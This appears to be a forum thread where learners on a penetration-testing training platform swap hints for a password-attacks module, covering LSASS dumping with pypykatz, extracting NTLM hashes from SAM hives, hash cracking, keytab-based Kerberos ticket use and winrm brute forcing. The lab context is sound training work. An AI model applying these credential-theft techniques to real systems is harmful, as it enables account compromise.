No! i skipped the module . i will do it later
for the .zip file doesn’ t work
it won’t let me download anything from git hub
nvm, i used scp to upload firefox_decrypt
For anyone else who can’t get pypykatz to work for the Attacking LSASS section, just copy the SAM registry hives as explained in the previous section to get the NTLM hash. Then you can use haschat (or crackstation if you’re feeling lazy) to get the password.
I wasted so much time trying to troubleshoot why pypypkatz wouldn’t install. If anyone knows how to get it to work, please DM me!
2 Likes
How did you fix it?
I am having the same issue. Thanks.
1 Like
Check out lsassy for attacking lsass : GitHub - Hackndo/lsassy: Extract credentials from lsass remotely
Not sure why it’s not included in this module. It seems to be more reliable. Also, for many methods of the attacks in this module check out: LSASS secrets - The Hacker Recipes
1 Like
make sure once you find the keytab file use the command like this
kinit LINUX01$ -k -t REDACTED.keytab
3 Likes
those on the Password Attacks Lab - Easy - don’t bother mutating the password list.
Hello, same problem. Stuck at the last Q8 for 3 days now!!! I know (think) where to find the last ccache file (indeed in /root/.k*/*** and is the same as one ccache file of julio already in /tmp folder???) but when exporting it, with klist I noticed expiration date has passed so it will not work.
Please help. Can I send someone a DM for the clue. Very frustrating now!!
Hey guys,
it seems that I am a bit to late with my question as the conversation passed this part long time ago, but I am still stucked with the remote password attacks on network services.
I tried different wordlists for username and password for winrm, but nothing worked for me.
The pwnbox run out of time and I had to start from the scratch again and again.
Does someone has a hint, which wordlists to use?
Would be really helpful! <3
SOLVED: Silly me… @everyone who stucks at the same point: there are provided resources with customized lists for usernames and passwords. Use them! 
1 Like
hi, do you mind share how did you find the username of winrm
how can we find them?
im still stuck with winrm
i solved it.
just use the Password-Attacks.zip from resources and ur good to go
1 Like
Did you manage to resolve the issue with pypykatz?
I cannot access the sam registry as the user htb-student - neither locally using reg.exe, nor remotely using crackmapexec. How did you manage to get it?
Update: pypykatz was not working from my Kali so I used the pwnbox. You need to install it. I recommend the pip installation. After its installed, it should work. Don’ forget that the dump file is called lsass.DMP not lsass.dmp
Did anyone else have problems with RDP connection to the target box in “Pass the Ticket (PtT) from Windows” section?
This is the error I get when trying to connect using xfreerdp with provided credentials:
[23:38:55:588] [22785:22786] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[23:38:55:588] [22785:22786] [WARN][com.freerdp.crypto] - CN = MS01.inlanefreight.htb
[23:38:55:790] [22785:22786] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[23:38:55:790] [22785:22786] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[23:38:55:790] [22785:22786] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[23:38:55:790] [22785:22786] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1
2 Likes
Unistalling pypykatz with config file using sudo apt --purge remove python3-pypykatz
and re-installing using python3 -m pip install pypykatz helped me solve it
1 Like
Can someone give some advice on this? Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_)
one of the users has admin privileges in \DC01, once you locate and export the correct keytab you can use winrm to access and move freely around \DC01